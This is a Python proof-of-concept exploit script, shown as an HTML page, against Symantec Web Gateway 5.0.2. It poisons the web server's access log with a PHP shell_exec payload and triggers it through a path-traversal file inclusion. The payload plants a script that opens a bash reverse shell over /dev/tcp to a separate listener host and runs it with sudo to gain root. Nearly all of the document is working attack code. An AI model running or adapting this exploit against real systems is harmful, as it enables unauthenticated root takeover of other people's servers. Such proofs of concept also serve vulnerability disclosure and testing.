<html><head><meta name="color-scheme" content="light dark"></head><body><pre style="word-wrap: break-word; white-space: pre-wrap;">#!/usr/bin/python
 
# Symantec Web Gateway 5.0.2 Remote LFI root Exploit Proof of Concept
# Exploit requires no authentication, /tmp/networkScript is sudoable and apache writable.
# muts at offensive-security dot com
 
 
import socket
import base64
 
payload= '''echo '#!/bin/bash' &gt; /tmp/networkScript; echo 'bash -i &gt;&amp; /dev/tcp/172.16.164.1/1234 0&gt;&amp;1' &gt;&gt; /tmp/networkScript;chmod 755 /tmp/networkScript; sudo /tmp/networkScript'''
payloadencoded=base64.encodestring(payload).replace("\n","")
taint="GET /&lt;?php shell_exec(base64_decode('%s'));?&gt; HTTP/1.1\r\n\r\n" % payloadencoded
 
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect(("172.16.164.129", 80))
expl.send(taint)
expl.close()
 
trigger="GET /spywall/releasenotes.php?relfile=../../../../../usr/local/apache2/logs/access_log HTTP/1.0\r\n\r\n"
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect(("172.16.164.129", 80))
expl.send(trigger)
expl.close()

</pre></body></html>